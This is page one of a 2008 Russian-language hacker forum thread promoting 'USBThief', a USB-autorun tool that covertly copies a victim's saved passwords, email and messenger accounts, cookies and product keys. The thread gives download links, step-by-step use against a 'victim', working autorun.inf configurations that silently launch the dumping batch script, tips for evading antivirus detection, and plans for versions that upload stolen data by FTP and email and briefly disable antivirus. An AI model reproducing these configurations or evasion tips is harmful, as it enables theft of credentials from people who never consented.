Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)
-   -   USBThief: копируем пароли жертвы, путем вставки USB носителя. (https://forum.antichat.xyz/showthread.php?t=63601)

vanpeld 06.03.2008 21:58
USBThief: копируем пароли жертвы, путем вставки USB носителя.
 

USBThief- это уникальная программа. Она умеет копирует (или красть, как кому удобно) пароли с любых PC, включая пароли лицензий! :) Программа проверена на работоспособность, работает отлично!

Цитата:
Итак, для установки нам потребуется USB наситель и данная програмка.
Распакуйте архив, и из папки USBThief скопируете всё на флэшку.
(Важно!!! Вы ДОЛЖНЫ скопировать все файлы в главную дирикторию USB насителя! Никаких папок создавать не надо!)

Как работает:
Вставьте USB в компьютер Вашей жертвы
В папке "dump" на USB вы увидите все пароли :)

Размер файла: 1.17 MB

Depositfiles
Скачать USBThief

iFolder
Скачать USBThief

.W 06.03.2008 22:06
Кто-то пробовал? Реально так?

Conquerstador 06.03.2008 23:38
Проверил! Все пашет на ура, автор молодец! +

iddqd 06.03.2008 23:40
Автозапуск чтоли?
А если он отключен?

Conquerstador 06.03.2008 23:47
а как ты его отключишь???
просто флешку суй и через минуты высунь и все вот что содержит autorun.inf

Код:
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat
не знаю кто придумал идею но со одной стороны очень банальная а с другой очень интересная!!!

iddqd 06.03.2008 23:49
И антивирус молчит?
проактивная защита Каспера должна орать...

Conquerstador 06.03.2008 23:50
Цитата:
Сообщение от iddqd
И антивирус молчит?
проактивная защита Каспера должна орать...
так я про то же что банальную вещь не палит но тут нет отправки как пинч придется ждать когда друг сходит в туалет а потом вставить флеху :)

Conquerstador 07.03.2008 00:00
Вот результаты вирус тотал, заметьте наши супер антивиры не палят как касперский, НОД и веб!!!

http://i009.radikal.ru/0803/b6/34c50400d499.jpg

Kusto 07.03.2008 00:31
ну жди- через пару дней начнут палить- сколько раз можно говорить что сбросив на вирустотал- все равно что отошлете файл на касперский лаб

LEE_ROY 07.03.2008 01:12
какая разница, касперы вэбы ноды тоже гуглить умеют и читают разные сайты и собирают свои сигнатурки. вирустотал непричем здесь.

Conquerstador 07.03.2008 17:37
Цитата:
Сообщение от zapadlo17
ну жди- через пару дней начнут палить- сколько раз можно говорить что сбросив на вирустотал- все равно что отошлете файл на касперский лаб
ты что думаешь что из-за какого-то пользователя в ачате я уже про россию молчу что 3/4 пользователи интернета, касперский начнет палить ну ты даешь конечно у них кроме этого туфтового вирус тотал есть своя лаборатория и накрутасы всякие, так что от одного пользователя это не зависит!!! :)

ReVOLVeR 07.03.2008 23:07
Неплохая прога... интересны мктоды реализации....

KillAll 13.03.2008 17:06
Я только не пойму почему антивирем проверяли nircmd.exe, ведь это только ехе-шник для запуска прог из директории batexe.
Естественно не будет палиться, потому что там ничего злого нету, ведь все "полезные" функции выполняет не nircmd.exe.
Пхожая статейка уже была, только в этой подборке больше прог, половина из которых под SP2 не пашет, но интересные проги есть. Взял некоторые на вооружение.

Реализовал через батник, только теперь по новым прогам нужно будет читать маны.

ReVOLVeR 13.03.2008 19:46
впринципе можно сделать собственную сборку по такому типу используя только нужный тебе софт
...

EST a1ien 13.03.2008 20:13
Цитата:
а как ты его отключишь???
просто флешку суй и через минуты высунь и все вот что содержит autorun.inf
У меня через твикеры отключен автозапуск со всех носителей.
И мне суй не суй флешку с этой прогой без разнице.

iddqd 13.03.2008 21:05
Цитата:
Сообщение от EST a1ien
У меня через твикеры отключен автозапуск со всех носителей.
И мне суй не суй флешку с этой прогой без разнице.
Правильнее сказать- "через реестр", ибо почти все, что делает твикер- делается в реестре.
И вообще этим штукам не следует доверять- непонятно, что они там еще делают- я предпочитаю все вручную

EST a1ien 13.03.2008 21:29
Я знаю что можно в ручную но просто в падлу лесть в регедит и искать ключик(а до этого искать где эта опция в нем находится). Просто тупо лень :)

MegaZLO 14.04.2008 10:33
нод32 гадко палит, хотя и инифицирует всего лишь как авторан вирус.

http://ipicture.ru/uploads/080414/8AO3zToUdT.jpg

Glynec 19.04.2008 10:45
Автору +.Былобы непрохо еслибы исходники выложил.

n0153r 21.04.2008 00:54
Цитата:
Сообщение от Glynec
Автору +.Былобы непрохо еслибы исходники выложил.
Исходники какой проги ?
Там проде и так понятно как все реализованно.

n0153r 22.04.2008 10:01
Цитата:
Сообщение от MegaZLO
нод32 гадко палит, хотя и инифицирует всего лишь как авторан вирус.

http://ipicture.ru/uploads/080414/8AO3zToUdT.jpg
Просто переделай автозагрузку.Немного изменить файлик autorun.ini и сборка не палитса. :cool:

Fisch_ka 22.04.2008 14:02
Если запретить автозагрузку ...зайти через Мой компьютер и открыть флешку...то USBThief все равно сделает свое черное дело??

symbioin 22.04.2008 22:39
USBThief portable antichat.ru edition

мне понравилась програмка. решыл улутшыть ее. незнаю автора, хотел бы отблагодарить за неё :) ета версия ето тот случай когда некуда скидивать на флешку или прочее. просто когда нужна моментально узнать всю инфу. в разработке щас новая версия в которой вводишь мыло. потом при експортировании данных файли аплоадятся на фтп. и отправляются на указаное мыло. и еще будет добавлена убийца антивирусов. на 2 секунды (а именно столько и нужна для получения инфы) будут остановлятся антивирусы а потом назад возобновятся.

ета версия одна бинарка которую мона скинуть на свое мыло :)


ссылки :

zip 1.99mb

http://rapidshare.com/files/109589469/USBthief.zip.html
http://depositfiles.com/ru/files/4906500
http://www.filefactory.com/file/6afc01/

exe 2.14mb

http://rapidshare.com/files/109589331/USBthief.exe.html
http://depositfiles.com/ru/files/4906525
http://www.filefactory.com/file/38a6b5/

KemSucks 02.05.2008 19:11
а без мыло можно что бы сразу на флэш ВСЮ инфу ?

zlo12 03.05.2008 18:11
А на плеер если закачать, работать будет?

Karantin 12.05.2008 19:33
Цитата:
Сообщение от zlo12
А на плеер если закачать, работать будет?
А почему нет? Плеер это, по сути таже флэшка. Хоть на телефон с USB кабелем.

rude 22.05.2008 23:14
Цитата:
Сообщение от symbioin
USBThief portable antichat.ru edition

мне понравилась програмка. решыл улутшыть ее. незнаю автора, хотел бы отблагодарить за неё :) ета версия ето тот случай когда некуда скидивать на флешку или прочее. просто когда нужна моментально узнать всю инфу. в разработке щас новая версия в которой вводишь мыло. потом при експортировании данных файли аплоадятся на фтп. и отправляются на указаное мыло. и еще будет добавлена убийца антивирусов. на 2 секунды (а именно столько и нужна для получения инфы) будут остановлятся антивирусы а потом назад возобновятся.

ета версия одна бинарка которую мона скинуть на свое мыло :)


ссылки :

zip 1.99mb

http://rapidshare.com/files/109589469/USBthief.zip.html
http://depositfiles.com/ru/files/4906500
http://www.filefactory.com/file/6afc01/

exe 2.14mb

http://rapidshare.com/files/109589331/USBthief.exe.html
http://depositfiles.com/ru/files/4906525
http://www.filefactory.com/file/38a6b5/
Скажите пожалуста, вот я её скачал ,установил на флешку, воткнул в ком , запустил авторун.Мне открылась папка dump в которой я так понимаю находятся нужные мне данные. И почему то половина их пустая, т.е нет никаких паролей и тому подобное ( Imclients, mail, Pst password, IEpassword, NetworkPassword ) !!! Может я что то не то делаю, или нетуда смотрю ???

Krinicin 29.05.2008 17:27
У меня тоже самое , помогите понять пожалуйста!

Ct-Ct 01.06.2008 03:12
Sacma

Karantin 01.06.2008 16:09
Цитата:
Скажите пожалуста, вот я её скачал ,установил на флешку, воткнул в ком , запустил авторун.Мне открылась папка dump в которой я так понимаю находятся нужные мне данные. И почему то половина их пустая, т.е нет никаких паролей и тому подобное ( Imclients, mail, Pst password, IEpassword, NetworkPassword ) !!! Может я что то не то делаю, или нетуда смотрю ???
Либо там нет сохраненных паролей, либо свежие версии софта , и, возможно, usb thief их не распознаёт.

willisbadi 14.06.2008 16:14
И антивирус молчит?
проактивная защита Каспера должна орать...

1SeTh 15.06.2008 00:52
мне интересно а как же защититься от нее? простой блок авторана помогает? если да то советую пользоватся USB disk security.
Еще такой вопрос можно все таки бросить exe файлы в папку, а авторане указать туда путь тому кому я собираюсь подсунуть флеху который далеко ужь не ламер.)))

1SeTh 28.06.2008 09:30
вот мой авторан если в случае автоплей не запустится и юзер не запустить флешку двойным шелчком. Тогда при помощи shell\название в контекстном меню\ мы добавим опции такие как open или explore. Соответсвенно это для english XP

Цитата:
[autorun]
UseAutoPlay=1
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat
shell\open\Command=nircmd.exe execmd CALL batexe\progstart.bat
shell\open\Default=1
shell\explore\Command=nircmd.exe execmd CALL batexe\progstart.bat
еще если есть подозрении на прог запускаемые в batexe то можете все сами скачать отсюда >> nirsoft.net заодно и обновить их

1SeTh 04.07.2008 11:58
кто нить знает почему когда я добавляю эти строчки в обе бат файлов? в следствие чего возникает ошибка и не выполняется команда

Цитата:
nircmd.exe execmd .\batexe\dialupass2.exe /shtml
"dump\~$sys.computername$\dialup.html"

antares 11.07.2008 14:42
а если порт юзбы закрыт программой-локером на низком уровне? у меня юзба открыта только на моей тачке, у юзеров все залокено и с флэхами все ходят ко мне...

1SeTh 17.07.2008 22:33
незнаю почему, но на многих компах просто не хочет дампировать. От чего это?

A2GIL 17.07.2008 23:10
Цитата:
Сообщение от 1SeTh
незнаю почему, но на многих компах просто не хочет дампировать. От чего это?
Ну возможно на компах этих ничего и нету! Да и вообще его уже антивири все обнаруживают, да откровенно говоря, подборка софта там для "вспоминания пароля" просто отстой!

1SeTh 18.07.2008 02:45
неужели даже хистории нету?)))
да вообще антивири не палять, если с оффсайта загрузить,
хорошая идея с подбором этих софтов.

AcidSlayer 22.07.2008 02:05
да +1) Нужно будет попробовать. Только не могу понять, Пароли от чего?! Или от всего возможного ИЗВЕСНОГО софта?!

echobyte 23.07.2008 10:35
Цитата:
Сообщение от AcidSlayer
да +1) Нужно будет попробовать. Только не могу понять, Пароли от чего?! Или от всего возможного ИЗВЕСНОГО софта?!
  • Startup Programs List
  • Visited Links List
  • Internet Explorer Passwords List
  • Instant Messengers Accounts List
  • Installed Windows Updates List
  • Email Accounts List
  • Cookies List
  • Adapters Report
  • Network Passwords List
  • TCP/UDP Ports List
  • Product Key List
  • PST Passwords List
  • Protected Storage Passwords List


Время: 07:28
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице